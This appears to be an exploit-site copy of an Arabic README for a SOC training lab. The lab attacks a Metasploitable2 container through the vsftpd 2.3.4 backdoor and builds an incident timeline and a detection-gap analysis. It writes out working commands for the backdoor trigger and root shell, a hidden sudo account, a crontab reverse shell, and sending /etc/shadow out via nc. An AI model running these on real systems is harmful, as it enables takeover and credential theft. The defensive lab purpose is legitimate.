Sploitus

Exploit for soc-investigation-lab

kitploit ยท 2026-08-19

Exploit Code

MARKDOWN246 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MITHILESHAN-SOC-INVESTIGATION-LAB
# ู…ุฎุชุจุฑ ุชุญู‚ูŠู‚ุงุช SOC ู…ุชูƒุงู…ู„

> ูŠู†ูู‘ุฐ ุณู„ุณู„ุฉ ู‡ุฌูˆู… ูƒุงู…ู„ุฉ ู…ู† ุฃุฑุจุน ู…ุฑุงุญู„ (ุงุณุชุทู„ุงุน โ† ุงุณุชุบู„ุงู„ โ† ุซุจุงุช โ† ุชุณุฑูŠุจ ุจูŠุงู†ุงุช) ุถุฏ Metasploitable2ุŒ ูˆูŠุฌู…ุน ุงู„ุฃุฏู„ุฉ ููŠ ูƒู„ ู…ุฑุญู„ุฉุŒ ูˆูŠู†ุชุฌ ุฎุทู‹ุง ุฒู…ู†ูŠู‹ุง ู…ู†ุธู…ู‹ุง ู„ู„ุญุงุฏุซ ูˆุชู‚ุฑูŠุฑ SOC โ€” ู…ู…ุง ูŠูุธู‡ุฑ ุงู„ุชููƒูŠุฑ ุงู„ู…ุชุฒุงู…ู† ู„ู„ู…ู‡ุงุฌู… ูˆุงู„ู…ุฏุงูุน.

![MITRE ATT&CK T1190](https://img.shields.io/badge/MITRE%20ATT&CK-T1190%20Exploit%20Public--Facing%20App-red) ![MITRE ATT&CK T1136](https://img.shields.io/badge/MITRE%20ATT&CK-T1136%20Create%20Account-red) ![MITRE ATT&CK T1078](https://img.shields.io/badge/MITRE%20ATT&CK-T1078%20Valid%20Accounts-red) ![MITRE ATT&CK T1041](https://img.shields.io/badge/MITRE%20ATT&CK-T1041%20Exfil%20Over%20C2-red) ![Python](https://img.shields.io/badge/Python-3.10+-blue?logo=python)

* * *

## ุงู„ู‡ุฏู

ู‡ุฐุง ู‡ูˆ ุงู„ู…ุดุฑูˆุน ุงู„ุฎุชุงู…ูŠ. ูŠุจูŠู‘ู† ุงู„ู‚ุฏุฑุฉ ุนู„ู‰:

  * ุชู†ููŠุฐ ุณู„ุณู„ุฉ ู‚ุชู„ ูˆุงู‚ุนูŠุฉ ุถุฏ ู‡ุฏู ู…ุนุฑู‘ุถ ู„ู„ุงุฎุชุฑุงู‚ ุนู† ู‚ุตุฏ
  * ุฌู…ุน ุฃุฏู„ุฉ ุฌู†ุงุฆูŠุฉ ููŠ ูƒู„ ู…ุฑุญู„ุฉ ุจุงุณุชุฎุฏุงู… ู…ุตุงุฏุฑ ุชูŠู„ูŠู…ุชุฑูŠ ู…ุชุนุฏุฏุฉ
  * ุฑุจุท ุฅุฏุฎุงู„ุงุช ุงู„ุณุฌู„ุงุช ู…ู† ุฃู†ุธู…ุฉ ู…ุชุจุงูŠู†ุฉ ููŠ ุฎุท ุฒู…ู†ูŠ ู…ูˆุญุฏ ู„ู„ุญุงุฏุซ
  * ุฅุฌุฑุงุก **ุชุญู„ูŠู„ ูุฌูˆุฉ ุงู„ุฑุคูŠุฉ** โ€” ู„ุชุญุฏูŠุฏ ู…ุง ูƒุงู† ุณูŠูููˆูŽู‘ุช _ุฏูˆู†_ ุชุบุทูŠุฉ ูƒุดู ู…ู†ุงุณุจุฉ
  * ุฅู†ุชุงุฌ ุชู‚ุฑูŠุฑ ุญุงุฏุซ ุจู…ุณุชูˆู‰ SOC ุจุงู„ุชู†ุณูŠู‚ ุงู„ู…ุณุชุฎุฏู… ู…ู† ูุฑู‚ ุงู„ุฃู…ู† ุงู„ุญู‚ูŠู‚ูŠุฉ



ุงู„ุงุณุชุบู„ุงู„ ุงู„ู…ุณุชุฎุฏู… (CVE-2011-2523 โ€” ุงู„ุจุงุจ ุงู„ุฎู„ููŠ ููŠ vsftpd 2.3.4) ุฐูˆ ุฃู‡ู…ูŠุฉ ุชุงุฑูŠุฎูŠุฉ: ูู‚ุฏ ูƒุงู† ู‡ุฌูˆู…ู‹ุง ุนู„ู‰ ุณู„ุณู„ุฉ ุงู„ุชูˆุฑูŠุฏ ุญูŠุซ ุญู‚ู† ุฎุตู… ุจุงุจู‹ุง ุฎู„ููŠู‹ุง ููŠ ู…ุณุชูˆุฏุน ุงู„ู…ุตุฏุฑ ุงู„ู…ูุชูˆุญ ู„ุญุฒู…ุฉ vsftpd.

* * *

## ุงู„ุจู†ูŠุฉ ุงู„ู…ุนู…ุงุฑูŠุฉ

root@kitploit:~
    
    
                        โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
                        โ•‘  soc-lab (172.23.0.0/24)       โ•‘
                        โ•‘                               โ•‘
    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”     โ•‘  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”  โ•‘
    โ”‚  Attacker   โ”‚     โ•‘  โ”‚  Metasploitable2        โ”‚  โ•‘
    โ”‚  Kali Linux โ”‚     โ•‘  โ”‚  172.23.0.200           โ”‚  โ•‘
    โ”‚             โ”‚     โ•‘  โ”‚                         โ”‚  โ•‘
    โ”‚  Phase 1    โ”‚โ”€โ”€โ”€โ”€โ”€โ•ซโ”€โ–บโ”‚  :21  vsftpd 2.3.4 โ—„โ”€โ”€โ”€โ•ซโ”€โ”€โ•ซโ”€โ”€ CVE-2011-2523
    โ”‚  nmap -A    โ”‚     โ•‘  โ”‚  :22  SSH               โ”‚  โ•‘    backdoor on :6200
    โ”‚             โ”‚     โ•‘  โ”‚  :80  HTTP (DVWA)        โ”‚  โ•‘
    โ”‚  Phase 2    โ”‚โ”€โ”€โ”€โ”€โ”€โ•ซโ”€โ–บโ”‚  :445 Samba             โ”‚  โ•‘
    โ”‚  msf exploitโ”‚โ—„โ”€โ”€โ”€โ”€โ•ซโ”€โ”€โ”‚  :6200 root shell       โ”‚  โ•‘
    โ”‚             โ”‚     โ•‘  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  โ•‘
    โ”‚  Phase 3    โ”‚โ”€โ”€โ”€โ”€โ”€โ•ซโ”€โ–บ useradd sysbackup           โ•‘
    โ”‚  persistenceโ”‚โ”€โ”€โ”€โ”€โ”€โ•ซโ”€โ–บ crontab reverse shell       โ•‘
    โ”‚             โ”‚     โ•‘                               โ•‘
    โ”‚  Phase 4    โ”‚โ—„โ”€โ”€โ”€โ”€โ•ซโ”€โ”€ /etc/shadow via nc :5555    โ•‘
    โ”‚  exfiltration     โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”˜
           โ”‚
           โ”‚ Evidence collection:
           โ”‚  logs/msf_session.log
           โ”‚  logs/target_auth.log
           โ”‚  captures/full_attack_chain.pcap (tshark CSV)
           โ–ผ
    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
    โ”‚  build_timeline.py                               โ”‚
    โ”‚  Parser: MSF log + auth.log + tshark CSV         โ”‚
    โ”‚  โ†’ merge by timestamp โ†’ tag by phase             โ”‚
    โ”‚  โ†’ JSON timeline + Markdown incident report      โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
    

* * *

## ุงู„ุฃุฏูˆุงุช ูˆุงู„ุชู‚ู†ูŠุงุช

* * *

## ุงู„ุฅุนุฏุงุฏ

root@kitploit:~
    
    
    cd docker/
    
    # Start Metasploitable2 (isolated network)
    docker compose up -d metasploitable
    
    # Verify target is reachable
    nmap -p 21,22,80 172.23.0.200
    
    # Start background packet capture
    sudo tcpdump -i eth0 host 172.23.0.200 \
        -w captures/full_attack_chain.pcap &
    

* * *

## ุทุฑูŠู‚ุฉ ุงู„ุชุดุบูŠู„ (ุณู„ุณู„ุฉ ุงู„ู‡ุฌูˆู…)

### ุงู„ู…ุฑุญู„ุฉ 1 โ€” ุงู„ุงุณุชุทู„ุงุน

root@kitploit:~
    
    
    nmap -sV -O -A \
        -p 21,22,80,139,445,3306,5432 \
        --script=banner,ftp-anon,http-title \
        -oX logs/recon_scan.xml \
        172.23.0.200
    

**ุงู„ู†ุชูŠุฌุฉ ุงู„ุฑุฆูŠุณูŠุฉ** : `21/tcp open ftp vsftpd 2.3.4`

### ุงู„ู…ุฑุญู„ุฉ 2 โ€” ุงู„ุงุณุชุบู„ุงู„ (CVE-2011-2523)

root@kitploit:~
    
    
    # Method A: Metasploit
    msfconsole -q -x "
      use exploit/unix/ftp/vsftpd_234_backdoor;
      set RHOSTS 172.23.0.200;
      set PAYLOAD cmd/unix/interact;
      run" | tee logs/msf_session.log
    
    # Method B: Manual (demonstrates the mechanism)
    # Step 1: Trigger backdoor by sending username with ':)'
    printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
    # Step 2: Connect to spawned root shell
    nc 172.23.0.200 6200
    # โ†’ id: uid=0(root) gid=0(root)
    

**ู„ู…ุงุฐุง ูŠุนู…ู„ ู‡ุฐุง** : ุนู†ุฏู…ุง ูŠุชู„ู‚ู‰ vsftpd 2.3.4 ุงุณู… ู…ุณุชุฎุฏู… ูŠุญุชูˆูŠ ุนู„ู‰ ุงู„ุณู„ุณู„ุฉ ุงู„ูุฑุนูŠุฉ `:)`ุŒ ูŠู†ูู‘ุฐ ุงู„ุจุฑู†ุงู…ุฌ ุงู„ุฎููŠ `execl("/bin/sh",...)` ู…ุฑุจูˆุทู‹ุง ุจู…ู†ูุฐ TCP 6200. ู„ุง ุญุงุฌุฉ ู„ู„ู…ุตุงุฏู‚ุฉ โ€” ุบู„ุงู ุฌุฐุฑ ู…ุจุงุดุฑ.

### ุงู„ู…ุฑุญู„ุฉ 3 โ€” ุงู„ุซุจุงุช

root@kitploit:~
    
    
    # Execute in the root shell on target:
    useradd -m -s /bin/bash sysbackup
    echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
    echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
    (crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -
    

### ุงู„ู…ุฑุญู„ุฉ 4 โ€” ุชุณุฑูŠุจ ุงู„ุจูŠุงู†ุงุช

root@kitploit:~
    
    
    # Receiver (attacker)
    nc -lvnp 5555 > samples/exfiltrated_shadow.txt
    
    # Sender (on target)
    cat /etc/shadow | nc 172.23.0.1 5555
    

### ุจู†ุงุก ุงู„ุฎุท ุงู„ุฒู…ู†ูŠ ู„ู„ุญุงุฏุซ

root@kitploit:~
    
    
    # Convert PCAP to CSV first
    bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap
    
    # Build timeline from all sources
    python3 src/build_timeline.py \
        --msf-log  logs/msf_session.log \
        --auth-log logs/target_auth.log \
        --pcap-csv captures/full_attack_chain_packets.csv \
        --output-json samples/timeline.json \
        --output-md   docs/incident_report.md \
        --pretty
    

* * *

## ู†ู…ูˆุฐุฌ ุงู„ุฅุฎุฑุงุฌ

### ู…ุฎุฑุฌุงุช `build_timeline.py` ุนู„ู‰ stderr

root@kitploit:~
    
    
    2026-04-24T16:05:20  [INFO    ]  Parsed 9 events from MSF log
    2026-04-24T16:05:20  [INFO    ]  Parsed 11 events from auth.log
    2026-04-24T16:05:20  [INFO    ]  Parsed 4 flow-initiation events from PCAP CSV
    2026-04-24T16:05:20  [INFO    ]  Total events (sorted): 24
    2026-04-24T16:05:20  [INFO    ]  Unique IOCs extracted: 4
    2026-04-24T16:05:20  [INFO    ]  Phase RECON   : 8 event(s)
    2026-04-24T16:05:20  [INFO    ]  Phase EXPLOIT : 4 event(s)
    2026-04-24T16:05:20  [INFO    ]  Phase PERSIST : 6 event(s)
    2026-04-24T16:05:20  [INFO    ]  Phase EXFIL   : 2 event(s)
    

### ุงู„ุฎุท ุงู„ุฒู…ู†ูŠ ู„ู„ุญุงุฏุซ (ู…ู‚ุชุทู ู…ู† `samples/sample_timeline.json`)

root@kitploit:~
    
    
    {
      "total_events": 24,
      "iocs": [
        { "indicator": "172.23.0.1", "phase": "RECON",   "occurrence": 8 },
        { "indicator": "172.23.0.1", "phase": "EXPLOIT",  "occurrence": 2 },
        { "indicator": "sysbackup",  "phase": "PERSIST", "occurrence": 1 }
      ],
      "timeline": [
        { "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON",   "description": "nmap -sV -O -A", "source": "metasploit" },
        { "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "session 1 opened (172.23.0.1 โ†’ 172.23.0.200)", "source": "metasploit" },
        { "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: new user: name=sysbackup", "source": "auth_log" },
        { "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL",   "description": "flow 172.23.0.200 โ†’ 172.23.0.1:5555", "source": "pcap" }
      ]
    }
    

* * *

## ุชุญู„ูŠู„ ูุฌูˆุฉ ุงู„ุฑุคูŠุฉ

ู‡ุฐุง ู‡ูˆ ุฃู‡ู… ู…ุฎุฑุฌ ุชุญู„ูŠู„ูŠ โ€” ู…ุง ูƒุงู† ุณูŠูููˆูŽู‘ุช _ุฏูˆู†_ ูƒุดู ู…ู†ุงุณุจ.

**ุงู„ู†ุชูŠุฌุฉ ุงู„ุญุฑุฌุฉ** : ู„ุง ูŠุชุฑูƒ ุงุณุชุบู„ุงู„ vsftpd 2.3.4 **ุฃูŠ ุฅุฏุฎุงู„ ููŠ auth.log** ู„ุฃู†ู‡ ูŠุชุฌุงูˆุฒ ู†ุธุงู… ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„. ุงู„ุฏู„ูŠู„ ุงู„ูˆุญูŠุฏ ููŠ ุงู„ุณุฌู„ุงุช ู‡ูˆ ุงุชุตุงู„ TCP ุงู„ู„ุงุญู‚ ุจุงู„ู…ู†ูุฐ 6200 โ€” ุบูŠุฑ ู…ุฑุฆูŠ ุฏูˆู† ุชูŠู„ูŠู…ุชุฑูŠ ุงู„ุดุจูƒุฉ. ู„ุง ูŠู…ูƒู† ู„ุณุฌู„ุงุช ู†ู‚ุงุท ุงู„ู†ู‡ุงูŠุฉ ูˆุญุฏู‡ุง ุงูƒุชุดุงู ู‡ุฐู‡ ุงู„ูุฆุฉ ู…ู† ุงู„ู‡ุฌู…ุงุช.

* * *

## ุงู„ู‚ูŠูˆุฏ ูˆุงู„ุนู…ู„ ุงู„ู…ุณุชู‚ุจู„ูŠ

* * *

## ุงู„ู…ุฑุงุฌุน

* * *

## ู‡ูŠูƒู„ ุงู„ู…ุดุฑูˆุน

root@kitploit:~
    
    
    04-soc-investigation/
    โ”œโ”€โ”€ src/
    โ”‚   โ”œโ”€โ”€ build_timeline.py      # Multi-source log merger + phase tagger
    โ”‚   โ””โ”€โ”€ run_attack_chain.sh    # Step-by-step attack chain with exact commands
    โ”œโ”€โ”€ configs/
    โ”‚   โ””โ”€โ”€ splunk_detection_rules.spl   # Phase-specific SPL queries (RECON/EXPLOIT/PERSIST/EXFIL)
    โ”œโ”€โ”€ samples/
    โ”‚   โ””โ”€โ”€ sample_timeline.json   # Example incident timeline JSON
    โ”œโ”€โ”€ docker/
    โ”‚   โ””โ”€โ”€ docker-compose.yml     # Metasploitable2 isolated target
    โ”œโ”€โ”€ docs/
    โ”‚   โ””โ”€โ”€ incident_report.md     # Generated SOC report (build_timeline.py --output-md)
    โ””โ”€โ”€ screenshots/